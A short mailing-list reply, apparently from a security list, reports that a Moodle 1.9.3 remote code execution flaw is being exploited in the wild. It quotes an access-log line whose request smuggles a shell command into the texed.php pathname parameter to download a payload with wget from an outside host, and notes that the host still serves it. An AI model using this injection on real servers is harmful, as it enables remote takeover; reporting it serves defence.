<<< Date Index >>>     <<< Thread Index >>>

Re: Moodle 1.9.3 Remote Code Execution



Exploit in the wild:

We saw this come across:

216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET 
/filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O 
perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218


The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 
-0500].

Chris Lent
Tel: +1.212.353.4350